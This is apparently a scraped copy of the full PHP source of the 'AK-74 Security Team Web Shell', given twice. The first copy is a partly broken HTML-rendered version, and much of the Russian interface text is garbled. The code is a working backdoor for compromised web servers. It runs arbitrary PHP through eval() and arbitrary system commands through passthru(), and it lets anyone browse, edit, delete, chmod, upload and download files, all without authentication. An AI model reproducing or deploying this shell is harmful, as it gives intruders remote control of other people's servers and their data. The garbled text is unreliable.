<b><font color="#830000">8. X Forwarded For IP - </font></b><font color="#830000">'.(getenv('HTTP_X_FORWARDED_FOR')).'</font><br><br>
</ol></td>
</tr>
</tbody></table>';
return $res;
}
function chmodform($file)
{
$perms = $this->getpermissionarray($file);
$res = '';
$res .= ''
.'';
return $res;
}
function editfileform($file)
{
$fp = fopen($file,'r');
if (!$fp)
return '�������������� �����';
$res = '';
$res .= ''
.'';
fclose($fp);
return $res;
}
function executeform()
{
$res = '';
$res .= '<table border="0" width="555" bgcolor="#eeeeee" cellspacing="0" cellpadding="3" style="border: #C10000 1px solid">
<tbody><tr><td align="center"><b><font color="#83000">Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team</a><a> <font color="#83000">2005 - '.date("Y").'</font></a></b></td></tr><form action="'.$xshell.'?act=filemanager" method="post"></form><input type="hidden" name="action" value="chmod"><input type="hidden" name="file" value="'.$file.'">
<tr>
<td align="center" colspan="7">
<b><font color="#83000">��������� ���� �������</font></b>
</td>
</tr>
<tr>
<td colspan="7" align="center">
';
$res .= '';
$res .= '';
for ($i = 1; $i <= 9; $i++)
$res .= '';
$res .= '';
$res .= '<table border="1" cellspacing="0" cellpadding="0"><tbody><tr align="center"><td> </td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td></tr><tr><td><input type="hidden" name="perms0" value="'.$perms[0].'">'.$perms[0].'</td><td><input type="checkbox" name="perms'.$i.'" '.(($perms[$i]="" !="-" )="" ?="" '="" checked'="" :="" ''="" ).'=""></td></tr><tr><td colspan="10" align="right"><input type="submit" value="���������"></td></tr></tbody></table></td></tr><form action="'.$xshell.'?act=filemanager" method="post"></form><input type="hidden" name="action" value="editfile"><input type="hidden" name="file" value="'.$file.'"><tr>
<td align="center" colspan="7">
<b><font color="#83000">�������������� �����</font></b>
</td>
</tr>
<tr>
<td colspan="7" align="center">
';
$res .= '';
$res .= '';
$res .= '<table border="1" cellspacing="0" cellpadding="0"><tbody><tr><td><textarea rows="25" cols="100" name="filecontent">'.(htmlspecialchars(fread($fp, filesize($file)))).'</textarea></td></tr><tr><td align="right"><b><font color="#830000">Rename:</font></b> <input type="TEXT" name="rename" size="100" maxlength="9999999" value=".$file."> - <input type="submit" value="�������������"></td></tr></tbody></table></td></tr><form action="'.$xshell.'?act=execute" method="post"></form><input type="hidden" name="action" value="execute">
<tr>
<td align="center" colspan="7">
<b><font color="#83000">���������� PHP-����<br> �������� � �������� PHP ���� ( <? � ?> ) ������ �� �����!</font></b>
</td>
</tr>
<tr>
<td colspan="7" align="center">
<table border="1" cellspacing="0" cellpadding="0"><tbody><tr><td><textarea rows="20" cols="80" name="phpcode">';
$res .= '</textarea></td></tr><tr><td align="right"><input type="submit" value="���������"></td></tr></tbody></table></td></tr>
</tbody></table>';
return $res;
}
function execute()
{
echo "<hr>";
echo "<pre>";
eval(stripslashes($_POST['phpcode']));
echo "</pre>";
echo "<hr>";
}
function exesysform()
{
$res = '';
$res .= '<table border="0" width="555" bgcolor="#eeeeee" cellspacing="0" cellpadding="3" style="border: #C10000 1px solid">
<tbody><tr><td align="center"><b><font color="#83000">Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team</a><a> <font color="#83000">2005 - '.date("Y").'</font></a></b></td></tr><input type="hidden" name="action" value="exesys">
<tr>
<td align="center" colspan="7">
<b><font color="#83000">Execute system commands!</font></b>
</td>
</tr>
<tr>
<td colspan="7" align="center">
<table border="1" cellspacing="0" cellpadding="0"><tbody><tr><td><textarea rows="5" cols="80" name="cmmd">';
$res .= '</textarea></td></tr><tr><td align="right"><input type="submit" value="���������"></td></tr></tbody></table></td></tr>
</tbody></table>';
return $res;
}
function exesys()
{
echo "<hr>";
echo "<pre>";
$result = passthru($_POST['cmmd']);
echo "</pre>";
echo "<hr>";
}
function editfile($file)
{
if (!empty($_POST['rename'])) {
rename ($_POST['file'], $_POST['rename']);
}
$fp = fopen($_POST['rename'],'w');
if (!$fp)
return 0;
fwrite($fp, stripslashes($_POST['filecontent']));
fclose($fp);
return 1;
}
function chmodfile($file)
{
$res = 0;
switch ($_POST['perms0'])
{
case 's':
$res = $res | 0xC000;
break;
case 'l':
$res = $res | 0xA000;
break;
case '-':
$res = $res | 0x8000;
break;
case 'b':
$res = $res | 0x6000;
break;
case 'd':
$res = $res | 0x4000;
break;
case 'c':
$res = $res | 0x2000;
break;
case 'p':
$res = $res | 0x1000;
break;
case 'u':
break;
}
if (isset($_POST['perms1']))
$res = $res | 0x0100;
if (isset($_POST['perms2']))
$res = $res | 0x0080;
if (isset($_POST['perms3']))
$res = $res | 0x0040;
if (isset($_POST['perms4']))
$res = $res | 0x0020;
if (isset($_POST['perms5']))
$res = $res | 0x0010;
if (isset($_POST['perms6']))
$res = $res | 0x0008;
if (isset($_POST['perms7']))
$res = $res | 0x0004;
if (isset($_POST['perms8']))
$res = $res | 0x0002;
if (isset($_POST['perms9']))
$res = $res | 0x0001;
echo substr(sprintf('%o', $res), -4);
return chmod($file,intval(substr(sprintf('%o', $res), -4),8));
}
function downloadfile($file)
{
header ("Content-Type: application/octet-stream");
header ("Content-Length: " . filesize($file));
header ("Content-Disposition: attachment; filename=$file");
readfile($file);
die();
}
function createdir()
{
if (!empty($_POST['dircreate']))
if (mkdir($_SESSION['currentdir'].'/'.$_POST['dircreate']))
return '���������� �������!';
return '������ ��� �������� ����������';
}
function createfile()
{
if (!empty($_POST['filecreate']))
{
if (file_exists($_SESSION['currentdir'].'/'.$_POST['filecreate']))
return '���� ��� ����������';
$fp = fopen($_SESSION['currentdir'].'/'.$_POST['filecreate'],"w");
if ($fp)
{
fclose($fp);
return '���� ������!';
}
}
return '������ ��� �������� �����';
}
function uploadfile()
{
if ($_FILES['filename']['error'] != 0)
return '121212';
$_POST['filename2'] = trim($_POST['filename2']);
if (empty($_POST['filename2']))
$_POST['filename2'] = $_FILES['filename']['name'];
if (!copy($_FILES['filename']['tmp_name'],$_SESSION['currentdir'].'/'.$_POST['filename2']))
if (!move_uploaded_file($_FILES['filename']['tmp_name'],$_SESSION['currentdir'].'/'.$_POST['filename2']))
return '������� ����� �� ���������...';
return '������� ����� ����������� �������!';
}
}
$shell = new shell();
$timestart = $shell->getmicrotime();
$content = '';
if (!isset($_SESSION['currentdir']))
$_SESSION['currentdir'] = str_replace('\\','/',$_SERVER['DOCUMENT_ROOT']);
if (isset($_GET['dir']))
{
if (opendir(realpath($_SESSION['currentdir'].'/'.$_GET['dir'])))
$_SESSION['currentdir'] = realpath($_SESSION['currentdir'].'/'.$_GET['dir']);
Header("Location: $xshell?act=filemanager");
}
$_SESSION['currentdir'] = str_replace('\\','/',$_SESSION['currentdir']);
if (substr($_SESSION['currentdir'],-1,1) == '/')
$_SESSION['currentdir'] = substr($_SESSION['currentdir'],0,-1);
switch ($_POST['action'])
{
case 'chmod':
if($shell->chmodfile($_POST['file']))
$content .= '����� ���� ��������� �������';
break;
case 'editfile':
if ($shell->editfile($_POST['file']))
$content .= '�������������� ��������� �������';
break;
case 'execute':
$shell->execute();
break;
case 'exesys':
$shell->exesys();
break;
case 'mkdir':
$content .= $shell->createdir();
break;
case 'createfile':
$content .= $shell->createfile();
break;
case 'uploadfile':
$content .= $shell->uploadfile();
break;
}
$content .= $shell->outputhead();
$content .= $shell->outputmenu();
switch ($_GET['act'])
{
case 'edit':
$content .= $shell->editfileform($_GET['file']);
break;
case 'chmod':
$content .= $shell->chmodform($_GET['file']);
break;
case 'down':
$content .= $shell->downloadfile($_GET['file']);
break;
case 'filemanager':
if ($_GET['act2'] == 'del')
$content .= $shell->removefile();
$content .= $shell->outputfilemanager();
if ($_GET['act3'] == 'del')
$content .= $shell->removedir();
break;
case 'phpinfo':
phpinfo();
die();
break;
case 'info':
$content .= $shell->outputinfo();
break;
case 'execute':
$content .= $shell->executeform();
break;
case 'exesys':
$content .= $shell->exesysform();
break;
}
$content .= $shell->outputdown();
echo $content;
echo '<center>����� ���������: '.($shell->getmicrotime()-$timestart).'</center>';
?><table border="0" width="555" bgcolor="#eeeeee" cellspacing="0" cellpadding="3" style="border: #C10000 1px solid">
<tbody><tr><td align="center"><b><font color="#83000">Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team</a><a> <font color="#83000">2005 - '.date("Y").'</font></a></b></td></tr></tbody></table></body></html>Original PHP code
<?
/*
.:: :[AK-74 Security Team Web Shell Beta Version]: ::.
- AK-74 Security Team Web Site: www.ak74-team.net
- Released on 01 June 2006.
- Copyright AK-74 Security Team, 2006.
- Thank you for using our script.
*/
error_reporting(0);
set_time_limit(0);
session_start();
$xshell = $SERVER_['PHP_SELF'];
class shell
{
function getfiles()
{
$mas = array();
$i = 0;
if ($handle = opendir($_SESSION['currentdir']))
{
while (false !== ($file = readdir($handle)))
if ($file != '..')
if (!is_dir($_SESSION['currentdir'].'/'.$file))
{
$mas[$i]['filename'] = $file;
$mas[$i]['filesize'] = filesize($_SESSION['currentdir'].'/'.$file);
$mas[$i]['lastmod'] = date("H.i/d.m.Y", filemtime($_SESSION['currentdir'].'/'.$file));
$i++;
}
closedir($handle);
}
return $mas;
}
function getdirs()
{
$mas = array();
if ($handle = opendir($_SESSION['currentdir']))
{
while (false !== ($dir = readdir($handle)))
if ($dir != '.' && is_dir($_SESSION['currentdir'].'/'.$dir))
$mas[] = $dir;
closedir($handle);
}
return $mas;
}
function geturl()
{
if ($_SESSION['currentdir'].'/' == $_SERVER['DOCUMENT_ROOT'])
return '/';
if (strpos($_SESSION['currentdir'],str_replace('\\','/',$_SERVER['DOCUMENT_ROOT'])) === false)
return '';
return str_replace($_SERVER['DOCUMENT_ROOT'],'',$_SESSION['currentdir'].'/');
}
function removefile()
{
if (file_exists($_GET['file']))
{
chmod($_GET['file'],0777);
if (unlink($_GET['file']))
return '���� ������!';
else
return '���� ������!';
}
else
return '���� �� ������!';
}
function removedir()
{
chmod($_GET['dir'],0777);
if (rmdir($_GET['dir']))
return '��������� �������!';
else
return '��������� �� ������a!';
}
function getmicrotime()
{
list($usec, $sec) = explode(" ",microtime());
return ((float)$usec + (float)$sec);
}
function getpermission($path)
{
$perms = fileperms($path);
if (($perms & 0xC000) == 0xC000)
$info = 's';
elseif (($perms & 0xA000) == 0xA000)
$info = 'l';
elseif (($perms & 0x8000) == 0x8000)
$info = '-';
elseif (($perms & 0x6000) == 0x6000)
$info = 'b';
elseif (($perms & 0x4000) == 0x4000)
$info = 'd';
elseif (($perms & 0x2000) == 0x2000)
$info = 'c';
elseif (($perms & 0x1000) == 0x1000)
$info = 'p';
else
$info = 'u';
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
return $info;
}
function getpermissionarray($path)
{
$res = array();
$perms = fileperms($path);
if (($perms & 0xC000) == 0xC000)
$res[] = 's';
elseif (($perms & 0xA000) == 0xA000)
$res[] = 'l';
elseif (($perms & 0x8000) == 0x8000)
$res[] = '-';
elseif (($perms & 0x6000) == 0x6000)
$res[] = 'b';
elseif (($perms & 0x4000) == 0x4000)
$res[] = 'd';
elseif (($perms & 0x2000) == 0x2000)
$res[] = 'c';
elseif (($perms & 0x1000) == 0x1000)
$res[] = 'p';
else
$res[] = 'u';
$res[] = (($perms & 0x0100) ? 'r' : '-');
$res[] = (($perms & 0x0080) ? 'w' : '-');
$res[] = (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
$res[] = (($perms & 0x0020) ? 'r' : '-');
$res[] = (($perms & 0x0010) ? 'w' : '-');
$res[] = (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
$res[] = (($perms & 0x0004) ? 'r' : '-');
$res[] = (($perms & 0x0002) ? 'w' : '-');
$res[] = (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
return $res;
}
function outputhead()
{
$res = '';
$res .= '<html><head><title>AK-74 Security Team Web Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"></head>
<body>
<STYLE>
A:link {
COLOR: #4d6d91; TEXT-DECORATION: underline
}
A:active {
COLOR: #4d6d91; TEXT-DECORATION: underline
}
A:visited {
COLOR: #4d6d91; TEXT-DECORATION: underline
}
A:hover {
COLOR: #C10000; TEXT-DECORATION: underline
}
TD {
FONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica
}
BODY {
FONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica; SCROLLBAR-FACE-COLOR: #cccccc; SCROLLBAR-HIGHLIGHT-COLOR: #c10000; SCROLLBAR-SHADOW-COLOR: #c10000; SCROLLBAR-3DLIGHT-COLOR: #830000; SCROLLBAR-ARROW-COLOR: #c10000; SCROLLBAR-TRACK-COLOR: #eeeeee; FONT-FAMILY: verdana; SCROLLBAR-DARKSHADOW-COLOR: #830000; BACKGROUND-COLOR: #dcdcdc;
}
</STYLE>
<div align="center"><table border=1 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 2px solid">
<tr>
<td colspan=7 align="center">
<b><font color=#830000 size=4>.:: :[ AK-74 Security Team Web-shell ]: ::.</font></b>
</td>
</tr>';
return $res;
}
function outputmenu()
{
$res = '';
$res .= '<tr>
<td colspan=7 align="center">
<table border=0 cellspacing=0 cellpadding=0>
<tr align="center">
<td width=150>
<a href="'.$xshell.'?act=info">��� ��������</a>
</td>
<td width=150>
<a href="'.$xshell.'?act=filemanager">������� ��������</a>
</td>
<td width=80>
<a href="'.$xshell.'?act=phpinfo" target="_blank">phpinfo()</a>
</td>
<td width=110>
<a href="'.$xshell.'?act=execute">������� PHP</a>
</td>
<td width=150>
<a href="'.$xshell.'?act=exesys">������� �������</a>
</td>
</tr>
</table>
</td>
</tr>';
return $res;
}
function outputdown()
{
$res = '';
$res .= '</table></div></body></html>';
return $res;
}
function outputfilemanager()
{
$res = '';
$number = 0;
$dirs = $this->getdirs();
$files = $this->getfiles();
sort($dirs);
sort($files);
$res .= '
<tr>
<td colspan=7 align="center">
<font color=#830000> ����� ���������:</font><b><font color=#830000>'.$_SESSION['currentdir'].'</font></b>
</td>
</tr>
<tr align="center">
<td width=30>
</td>
<td width=330>
</td>
<td width=80><font color=#830000>������,</font> <b><font color=#830000>����</font></b>
</td>
<td width=120><font color=#830000>
��������� ���������
</font>
</td>
<td width=80 align="center"><font color=#830000>����� �������</font>
</td>
<td width=30>
</td>
<td width=30>
</td>
</tr>';
for ($i = 0; $i < count($dirs); $i++)
{
$res .= '<tr><td><b><font color=#830000>'.(++$number).'</font></b></td><td><b><a href="'.$xshell.'?act=filemanager&dir='.$dirs[$i].'">'.$dirs[$i].'</a></b></td><td> </td><td> </td><td>';
$res .= '<a href="'.$xshell.'?act=chmod&file='.$_SESSION['currentdir'].'/'.$dirs[$i].'">'.($this->getpermission($_SESSION['currentdir'].'/'.$dirs[$i])).'</a>';
$res .= '</td><td> </td><td><a href="'.$xshell.'?act=filemanager&act3=del&dir='.$_SESSION['currentdir'].'/'.$dirs[$i].'">delete</a></td></tr>';
}
for ($i = 0; $i < count($files); $i++)
{
$res .= '<tr><td><b><font color=#830000>'.(++$number).'</font></b></td>';
$res .= '<td><a href="'.$xshell.'?act=down&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">'.$files[$i]['filename'].'</a></td>';
$res .= '<td> '.$files[$i]['filesize'].'</td>';
$res .= '<td align="center">'.$files[$i]['lastmod'].'</td>';
$res .= '<td align="center"><a href="'.$xshell.'?act=chmod&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">'.($this->getpermission($_SESSION['currentdir'].'/'.$files[$i]['filename'])).'</a></td>';
$res .= '<td align="center"><a href="'.$xshell.'?act=edit&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">edit</a></td>';
$res .= '<td align="center"><a href="'.$xshell.'?act=filemanager&act2=del&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">delete</a></td></tr>';
}
$res .= '</table><br>';
$res .= '<table border=0 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 2px solid">';
$res .= '<tr><td align=center><form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="mkdir"><b><font color=#830000>������ ���������:</b></font> </td><td><input type="text" name="dircreate"><input type="submit" value="������"></form></td></tr>';
$res .= '<tr><td align=center><form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="createfile"><b><font color=#830000>������ ����:</b></font></td><td> <input type="text" name="filecreate"><input type="submit" value="������"></form></td></tr>';
$res .= '<tr><td align=center><form enctype="multipart/form-data" action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="uploadfile"><b><font color=#830000>������ ����:</font></b></td><td><input type="file" name="filename" size="23"> <b><font color=#830000>� �������� ��</b></font></td><td> <input type="text" name="filename2"><input type="submit" value="�����"></form></td></tr>';
$res .= '<table border=0 width="700" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">';
$res .= '<tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - '.date("Y").'</font></b></td></tr>';
return $res;
}
function outputinfo()
{
$res = '';
$res .= '<tr>
<td align="center" colspan=7>
<b><font color=#83000>��� �������� � �������</font></b>
</td>
</tr>
<tr>
<td colspan=7 align="left"><br>
<ol>
<b><font color=#830000>1. OS - </font></b><font color=#830000>'.(php_uname()).'</font><br><br>
<b><font color=#830000>2. ����� PHP - </font></b><font color=#830000>'.(phpversion()).'</font><br><br>
<b><font color=#830000>3.</font></b><font color=#830000> <b><font color=#830000>User</b></font> - '.( get_current_user()).' <b><font color=#830000>|| User ID</font></b> - '.( getmyuid()).' <b><font color=#830000>|| Group ID</b></font> - '.( getmygid ()).'</font><br><br>
<b><font color=#830000>4. Server Software - </font></b><font color=#830000>'.(getenv('SERVER_SOFTWARE')).'</font><br><br>
<b><font color=#830000>5. Request Method - </font></b><font color=#830000>'.(getenv('REQUEST_METHOD')).'</font><br><br>
<b><font color=#830000>6. Server IP - </font></b><font color=#830000>'.(getenv('SERVER_ADDR')).'</font><br><br>
<b><font color=#830000>7. Your IP - </font></b><font color=#830000>'.(getenv('REMOTE_ADDR')).'</font><br><br>
<b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>'.(getenv('HTTP_X_FORWARDED_FOR')).'</font><br><br>
</td>
</tr>
<table border=0 width="555" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">
<tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - '.date("Y").'</font></b></td></tr>';
return $res;
}
function chmodform($file)
{
$perms = $this->getpermissionarray($file);
$res = '';
$res .= '<form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="chmod">'
.'<input type="hidden" name="file" value="'.$file.'">
<tr>
<td align="center" colspan=7>
<b><font color=#83000>��������� ���� �������</font></b>
</td>
</tr>
<tr>
<td colspan=7 align="center">
<table border=1 cellspacing=0 cellpadding=0>';
$res .= '<tr align="center"><td> </td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td></tr>';
$res .= '<tr><td><input type="hidden" name="perms0" value="'.$perms[0].'">'.$perms[0].'</td>';
for ($i = 1; $i <= 9; $i++)
$res .= '<td><input type="checkbox" name="perms'.$i.'"'.(($perms[$i] != '-') ? ' checked' : '' ).'></td>';
$res .= '</tr><tr><td colspan=10 align="right"><input type="submit" value="�������"></td></tr>';
$res .= '</table></td></tr></form>';
return $res;
}
function editfileform($file)
{
$fp = fopen($file,'r');
if (!$fp)
return '�������������� �����';
$res = '';
$res .= '<form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="editfile">'
.'<input type="hidden" name="file" value="'.$file.'"><tr>
<td align="center" colspan=7>
<b><font color=#83000>�������������� �����</font></b>
</td>
</tr>
<tr>
<td colspan=7 align="center">
<table border=1 cellspacing=0 cellpadding=0>';
$res .= '<tr><td><textarea rows=25 cols=100 name="filecontent">'.(htmlspecialchars(fread($fp, filesize($file)))).'</textarea></td></tr>';
$res .= '<tr><td align="right"><b><font color=#830000>Rename:</font></b> <INPUT TYPE=TEXT NAME=rename size=100 maxlength=9999999 value='.$file.'> - <input type="submit" value="������������"></td></tr>';
$res .= '</table></td></tr></form>';
fclose($fp);
return $res;
}
function executeform()
{
$res = '';
$res .= '<form action="'.$xshell.'?act=execute" method="post"><input type="hidden" name="action" value="execute">
<tr>
<td align="center" colspan=7>
<b><font color=#83000>��������� PHP-����<br> ������� � ������� PHP ���� ( <? � ?> ) ����� �� �����!</font></b>
</td>
</tr>
<tr>
<td colspan=7 align="center">
<table border=1 cellspacing=0 cellpadding=0><tr><td><textarea rows=20 cols=80 name="phpcode">';
$res .= '</textarea></td></tr><tr><td align="right"><input type="submit" value="�������"></td></tr></table></td></tr>
<table border=0 width="555" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">
<tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - '.date("Y").'</font></b></td></tr>';
return $res;
}
function execute()
{
echo "<hr>";
echo "<pre>";
eval(stripslashes($_POST['phpcode']));
echo "</pre>";
echo "<hr>";
}
function exesysform()
{
$res = '';
$res .= '<form action="'.$xshell.'?act=exesys" method="post"><input type="hidden" name="action" value="exesys">
<tr>
<td align="center" colspan=7>
<b><font color=#83000>Execute system commands!</font></b>
</td>
</tr>
<tr>
<td colspan=7 align="center">
<table border=1 cellspacing=0 cellpadding=0><tr><td><textarea rows=5 cols=80 name="cmmd">';
$res .= '</textarea></td></tr><tr><td align="right"><input type="submit" value="�������"></td></tr></table></td></tr>
<table border=0 width="555" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">
<tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - '.date("Y").'</font></b></td></tr>';
return $res;
}
function exesys()
{
echo "<hr>";
echo "<pre>";
$result = passthru($_POST['cmmd']);
echo "</pre>";
echo "<hr>";
}
function editfile($file)
{
if (!empty($_POST['rename'])) {
rename ($_POST['file'], $_POST['rename']);
}
$fp = fopen($_POST['rename'],'w');
if (!$fp)
return 0;
fwrite($fp, stripslashes($_POST['filecontent']));
fclose($fp);
return 1;
}
function chmodfile($file)
{
$res = 0;
switch ($_POST['perms0'])
{
case 's':
$res = $res | 0xC000;
break;
case 'l':
$res = $res | 0xA000;
break;
case '-':
$res = $res | 0x8000;
break;
case 'b':
$res = $res | 0x6000;
break;
case 'd':
$res = $res | 0x4000;
break;
case 'c':
$res = $res | 0x2000;
break;
case 'p':
$res = $res | 0x1000;
break;
case 'u':
break;
}
if (isset($_POST['perms1']))
$res = $res | 0x0100;
if (isset($_POST['perms2']))
$res = $res | 0x0080;
if (isset($_POST['perms3']))
$res = $res | 0x0040;
if (isset($_POST['perms4']))
$res = $res | 0x0020;
if (isset($_POST['perms5']))
$res = $res | 0x0010;
if (isset($_POST['perms6']))
$res = $res | 0x0008;
if (isset($_POST['perms7']))
$res = $res | 0x0004;
if (isset($_POST['perms8']))
$res = $res | 0x0002;
if (isset($_POST['perms9']))
$res = $res | 0x0001;
echo substr(sprintf('%o', $res), -4);
return chmod($file,intval(substr(sprintf('%o', $res), -4),8));
}
function downloadfile($file)
{
header ("Content-Type: application/octet-stream");
header ("Content-Length: " . filesize($file));
header ("Content-Disposition: attachment; filename=$file");
readfile($file);
die();
}
function createdir()
{
if (!empty($_POST['dircreate']))
if (mkdir($_SESSION['currentdir'].'/'.$_POST['dircreate']))
return '��������� �������!';
return '����� ��� �������� ����������';
}
function createfile()
{
if (!empty($_POST['filecreate']))
{
if (file_exists($_SESSION['currentdir'].'/'.$_POST['filecreate']))
return '���� ��� ���������';
$fp = fopen($_SESSION['currentdir'].'/'.$_POST['filecreate'],"w");
if ($fp)
{
fclose($fp);
return '���� ������!';
}
}
return '����� ��� �������� �����';
}
function uploadfile()
{
if ($_FILES['filename']['error'] != 0)
return '121212';
$_POST['filename2'] = trim($_POST['filename2']);
if (empty($_POST['filename2']))
$_POST['filename2'] = $_FILES['filename']['name'];
if (!copy($_FILES['filename']['tmp_name'],$_SESSION['currentdir'].'/'.$_POST['filename2']))
if (!move_uploaded_file($_FILES['filename']['tmp_name'],$_SESSION['currentdir'].'/'.$_POST['filename2']))
return '������ ����� �� ��������...';
return '������ ����� ����������� ������!';
}
}
$shell = new shell();
$timestart = $shell->getmicrotime();
$content = '';
if (!isset($_SESSION['currentdir']))
$_SESSION['currentdir'] = str_replace('\\','/',$_SERVER['DOCUMENT_ROOT']);
if (isset($_GET['dir']))
{
if (opendir(realpath($_SESSION['currentdir'].'/'.$_GET['dir'])))
$_SESSION['currentdir'] = realpath($_SESSION['currentdir'].'/'.$_GET['dir']);
Header("Location: $xshell?act=filemanager");
}
$_SESSION['currentdir'] = str_replace('\\','/',$_SESSION['currentdir']);
if (substr($_SESSION['currentdir'],-1,1) == '/')
$_SESSION['currentdir'] = substr($_SESSION['currentdir'],0,-1);
switch ($_POST['action'])
{
case 'chmod':
if($shell->chmodfile($_POST['file']))
$content .= '����� ���� �������� ������';
break;
case 'editfile':
if ($shell->editfile($_POST['file']))
$content .= '�������������� �������� ������';
break;
case 'execute':
$shell->execute();
break;
case 'exesys':
$shell->exesys();
break;
case 'mkdir':
$content .= $shell->createdir();
break;
case 'createfile':
$content .= $shell->createfile();
break;
case 'uploadfile':
$content .= $shell->uploadfile();
break;
}
$content .= $shell->outputhead();
$content .= $shell->outputmenu();
switch ($_GET['act'])
{
case 'edit':
$content .= $shell->editfileform($_GET['file']);
break;
case 'chmod':
$content .= $shell->chmodform($_GET['file']);
break;
case 'down':
$content .= $shell->downloadfile($_GET['file']);
break;
case 'filemanager':
if ($_GET['act2'] == 'del')
$content .= $shell->removefile();
$content .= $shell->outputfilemanager();
if ($_GET['act3'] == 'del')
$content .= $shell->removedir();
break;
case 'phpinfo':
phpinfo();
die();
break;
case 'info':
$content .= $shell->outputinfo();
break;
case 'execute':
$content .= $shell->executeform();
break;
case 'exesys':
$content .= $shell->exesysform();
break;
}
$content .= $shell->outputdown();
echo $content;
echo '<center>���� ��������: '.($shell->getmicrotime()-$timestart).'</center>';
?>